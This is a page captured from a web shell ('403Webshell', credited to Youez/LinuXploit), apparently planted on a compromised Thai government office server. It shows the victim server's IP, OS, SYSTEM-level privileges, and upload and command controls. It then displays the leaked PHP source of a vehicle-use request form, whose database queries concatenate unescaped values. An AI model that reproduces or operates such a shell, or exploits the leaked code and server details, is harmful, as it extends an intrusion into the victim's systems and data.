403Webshell
Server IP : 172.67.187.206  /  Your IP : 172.71.28.156
Web Server : Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
System : Windows NT WIN-ECQAAA40806 6.2 build 9200 (Windows Server 2012 Standard Edition) i586
User : SYSTEM ( 0)
PHP Version : 5.6.30
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /Inetpub/www/myoffice/2566/modules/car/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /Inetpub/www/myoffice/2566/modules/car/readcar.php
<link href="style_web.css" rel="stylesheet" type="text/css" />
	<TABLE cellSpacing=0 cellPadding=0 width=1005 height=500 border=0 align="center">
      <TBODY>
        <TR>
          <TD  align="center" vAlign=top>
<TABLE cellSpacing=0 cellPadding=0 width=880 height="345"border=0 bgcolor=FFFFFF>
        <TR>
          <TD  vAlign=top>
<?
//	CheckUser($_SESSION['user_user']);
		$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
		$res[user] = $db->select_query("SELECT * FROM ".TB_user." WHERE username='".$_SESSION['user_user']."' ");
		$arr[user] = $db->fetch($res[user]);
$_GET['id'] = intval($_GET['id']);

//แสดงข่าวสาร/ประชาสัมพันธ์ 
//ดึงค่า
$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
$res[years] = $db->select_query("SELECT * FROM ".TB_YEARS_CAT." ORDER BY id ");
$arr[years] = $db->fetch($res[years]);		
$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
$res[car] = $db->select_query("SELECT * FROM ".TB_CAR." WHERE id='$_GET[id]'  ");
$arr[car] = $db->fetch($res[car]);
$res[user] = $db->select_query("SELECT * FROM ".TB_user." WHERE id='".$arr[car][cat]."'  ");
$arr[user] = $db->fetch($res[user]);

$db->closedb ();
{
?>   
<table width="900" align="center"border="0" cellspacing="0" cellpadding="0" bgcolor=ffffff>
<table width="900" border="0" cellspacing="0" cellpadding="0">
    <tr> 
   <td width="850"align="center"><B>&nbsp;แบบขออนุญาตใช้รถยนต์ราชการ&nbsp;&nbsp;&nbsp;</B></td>
   </tr>
   <tr> 
   <td width="850"align="right"><B>&nbsp;แบบ 3&nbsp;&nbsp;&nbsp;</B></td>
   </tr>
<tr>
<td>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<B>วันที่&nbsp;&nbsp;<?echo ("".thai_date_fullmonth(strtotime($arr[car][date]))."" );?>
</td>
  </tr>
   <tr>
   <td>
 <B>เรียน&nbsp;&nbsp;ผู้อำนวยการ<?=WEB_TITLE;?></B>
<BR>
 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<B>ข้าพเจ้า&nbsp;&nbsp;<?=$arr[car][name];?>&nbsp;&nbsp;ตำแหน่ง&nbsp;&nbsp;<?=$arr[car][position];?> <?=$arr[car][kom];?>&nbsp;&nbsp;สังกัด <?=WEB_TITLE;?>&nbsp;&nbsp;
 	  <?
		 if($arr[car][person]){ 	  
	?>
 พร้อมด้วย&nbsp;&nbsp;<?=$arr[car][person];?> 
 		  <? } else {echo "";}?>
 ขออนุญาตใช้รถเพื่อ&nbsp;&nbsp;<?=$arr[car][topic];?> &nbsp;&nbsp;ณ&nbsp;&nbsp;<?=$arr[car][na];?> &nbsp;&nbsp; มีคนนั่ง&nbsp;&nbsp;<?=$arr[car][num];?>&nbsp;&nbsp;คน&nbsp;&nbsp;ตั้งแต่วันที่&nbsp;&nbsp;<?echo ("".thai_date_fullmonth(strtotime($arr[car][date1]))."" );?>&nbsp;&nbsp;เวลา&nbsp;&nbsp;<?=$arr[car][time1];?>&nbsp;&nbsp;น.&nbsp;&nbsp;ถึงวันที่&nbsp;&nbsp;<?echo ("".thai_date_fullmonth(strtotime($arr[car][date2]))."" );?>&nbsp;&nbsp;เวลา&nbsp;&nbsp;<?=$arr[car][time2];?>&nbsp;&nbsp;น.&nbsp;&nbsp; จำนวน&nbsp;&nbsp;<?=$arr[car][sumday];?>&nbsp;&nbsp;วัน&nbsp;&nbsp;โดยใช้น้ำมันเชื้อเพลิงจาก  <?=($arr[car][pay]);?></B>
  <td>
<tr>
<td align="center">
<BR>
		<?
	//ทำการเพิ่มจำนวนคนเข้าชม
	$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
	$res[user] = $db->select_query("SELECT * FROM ".TB_user." WHERE id='".$arr[car][cat]."'  ");
	$arr[user] = $db->fetch($res[user]);
?>
<IMG SRC="laysen/<?=$arr[car][cat];?>.jpg">
<BR>
	(<?=$arr[user][category_name];?>)
	<BR>
	<?=$arr[user][posit];?>
<?
					 if($arr[user][work]=='2'){ 	  
?>
<?=$arr[user][school];?>
<? }?>
<?
					 if($arr[user][work]=='3'){ 	  
?>
<?=$arr[user][school];?>
<? }?>
	<BR>ผู้ขออนุญาต
<?
					 if($arr[car][laysen3]){ 	  
?>
<?
	//ทำการเพิ่มจำนวนคนเข้าชม
	$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
	$res[user] = $db->select_query("SELECT * FROM ".TB_user." WHERE id='".$arr[car][laysen3]."'  ");
	$arr[user] = $db->fetch($res[user]);
?>
<BR>
<IMG SRC="laysen/<?=$arr[car][laysen3];?>.jpg">
<BR>
	   (<?=$arr[user][category_name];?>)
	<BR>
	ผู้อำนวยการ<?=$arr[car][kom];?>
<? }?>
</td>
  </tr>
<tr>
<td>
<?
					 if($arr[car][full_text]){ 	  
?>
<br><FONT COLOR="#990000">เอกสารแนบ</FONT></B>[<a href="car/<?=$arr[car][post_date];?><?=$arr[car][full_text];?>" target="_blank"><b>ไฟล์ที่ 1</b></A>]  
<BR>
		  <? } else {echo "";}?>
</td>
  </tr>
<tr>
<td align="center">
	<BR>
<?
//	CheckUser($_SESSION['user_user']);
		$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
		$res[user] = $db->select_query("SELECT * FROM ".TB_user." WHERE id='".$arr[car][cat]."'  ");
		$arr[user] = $db->fetch($res[user]);
?>

<table cellspacing="1" cellpadding="1" align="center"width="850" border="0">
  <tr>
    <td valign="top">	
<tr> 
      <td colspan="4" valign="top" align="left">
	  <B><u>ความเห็นเจ้าหน้าที่ควบคุมยานพาหนะ</u>
	  <BR>
	  1.ควรอนุญาตให้ใช้รถยนต์ส่วนกลาง หมายเลขทะเบียน  <?=($arr[car][tabain]);?> โดยมี  <?=($arr[car][driver]);?> ทำหน้าที่พนักงานขับรถ 
	  <BR>
	  2.อื่นๆ
	  <?
		 if($arr[car][reson]==''){ 	  
	?>
............................................................................
 <? } else {echo ""; }?>
	  </B><div align=center>
	  <BR>
	<?
		$res[user] = $db->select_query("SELECT * FROM ".TB_user." WHERE id='".$arr[car][laysen2]."'  ");
		$arr[user] = $db->fetch($res[user]);
?>
<table width="400" border="0" bordercolor="#000000">
  <tr> 
    <td height="5"align="center" </td>
    <td width="271" rowspan="2"align="center">
<IMG SRC="laysen/<?=($arr[car][laysen2]);?>.jpg"align="top">
<BR>
<B>	(<?=$arr[user][category_name];?>)</B>
	<BR>
	<B><?=$arr[user][posit];?></B>
	</td>
    <td height="5"></td>
  </tr>
  <tr> 
    <td width="100" align="right" valign="top"><B>ลงชื่อ</B></td>
    <td width="100" height="25" align="left" valign="top"><B>ผู้ตรวจสอบ</B></td>
  </tr>
</table>

</td>
    <td width="500" height="39" valign="top"><TABLE cellSpacing=0 cellPadding=0 width=500 border=0 align="center" >
&nbsp;<B>ความเห็นผู้บังคับบัญชา</B>
<?
if($arr[car][enable_comment]){
//	CheckUser($_SESSION['user_user']);
		$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
		$res[user] = $db->select_query("SELECT * FROM ".TB_user." WHERE username='".$_SESSION['user_user']."' ");
		$arr[user] = $db->fetch($res[user]);

	
	//Check Comment
	$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
	$res[comment] = $db->select_query("SELECT * FROM ".TB_CAR_COMMENT." WHERE car_id='".$arr[car][id]."' ORDER BY id ");
	$count=0;
	while($arr[comment] = $db->fetch($res[comment])){
	$res[user] = $db->select_query("SELECT * FROM ".TB_user." WHERE id='".$arr[comment][laysen1]."'  ");
	$arr[user] = $db->fetch($res[user]);
		$count  ++;
?>	

<TR>
<TD><div align="center"><B></FONT></B></div>
</TD>
</TR>
<TR>
<TD align="center">
<?
					 if($arr[comment][detail]){ 	  
?>
<?=($arr[comment][detail]);?>
<BR>
<? } ?>
<?
					 if($arr[comment][work]==''){ 	  
?>
<IMG SRC="laysen/<?=($arr[comment][laysen1]);?>.jpg">
<BR>
(<?=($arr[user][category_name]);?>)
<BR>
<?=($arr[user][posit]);?>
<? } ?>

<?
					 if($arr[comment][work]==3){ 	  
?>
<IMG SRC="laysen/<?=($arr[comment][laysen1]);?>.jpg">
<BR>
<BR>
(<?=($arr[user][category_name]);?>)
<BR>
<?=($arr[user][posit]);?><?=($arr[user][school]);?>
<? } ?>
			</div>
			</TD>
			</TR>
			<TR>
				<TD height="1" class="dotline"></TD>
			</TR>

<?
					 if($arr[comment][comment1]=='ส่งคืน'){ 	  
?>
			<TR>
				<TD><div align="center"><B><?=($arr[comment][detail]);?></FONT></B></div></TD>
				</TR>
			<TR><TD align="center"><B>
			<div align="center"><B><IMG SRC="laysen/<?=($arr[comment][laysen1]);?>.jpg">
			</div></TD>
			</TR>
			<TR>
				<TD height="1" class="dotline"></TD>
			</TR>
<? } ?>	
<?
					 if($arr[comment][comment1]=='อนุญาต'){ 	  
?>
			<TR>
				<TD>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<B>คำสั่ง</B><div align="center"><B><?=($arr[comment][detail]);?></FONT></B></div>
				</TD>
				</TR>
			<TR>
			<TD align="left">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<B><IMG SRC="images/tick.png"> <?=($arr[comment][comment1]);?></B>
			<BR>
			<div align="center">
			<IMG SRC="laysen/<?=($arr[comment][laysen1]);?>.jpg">
		<BR>
						(<?=($arr[user][category_name]);?>)
		<BR>
<?
					 if($arr[comment][work]=='5'){ 	  
?>

<?=($arr[user][posit]);?> <?=WEB_P_DIRECTOR;?><?=WEB_TITLE;?>
<? } ?>
<?
					 if($arr[comment][work]=='1'){ 	  
?>

<?=WEB_D_DIRECTOR;?> <?=WEB_P_DIRECTOR;?><?=WEB_TITLE;?>
<? } ?>
<?
					 if(($arr[comment][work]=='2')AND($arr[user][working]=='2')){ 	  
?>
<?=WEB_D_DIRECTOR;?> <?=WEB_R_DIRECTOR;?><?=WEB_TITLE;?>
<BR>
<? }?>
<?
					 if(($arr[comment][work]=='2')AND($arr[user][working]=='4')){ 	  
?>
<?=($arr[user][posit]);?> <?=WEB_R_DIRECTOR;?><?=WEB_TITLE;?>
<BR>
<? }?>

<?
					 if(($arr[comment][work]=='2')AND($arr[user][working]=='12')){ 	  
?>
<?=($arr[user][posit]);?><?=($arr[user][school]);?> <?=WEB_R_DIRECTOR;?><?=WEB_TITLE;?>
<BR>
<? }?>
<?
					 if($arr[comment][work]=='4'){ 	  
?>

<?=($arr[user][posit]);?><?=WEB_TITLE;?>
<? } ?>
</div></TD>
				</TR>
			
			<TR>
				<TD height="1" class="dotline"></TD>
			</TR>
			<? } ?>
<?}?>
			</TABLE>
<?
	}
	$db->closedb ();
?>
		<!-- Enable Comment -->
<? } ?>
</td>
  </tr>
</table>
	</td>
	 </tr>
			</TABLE>
		  </TD>
        </TR>
      </TBODY>
    </TABLE>

Youez - 2016 - github.com/yon3zu
LinuXploit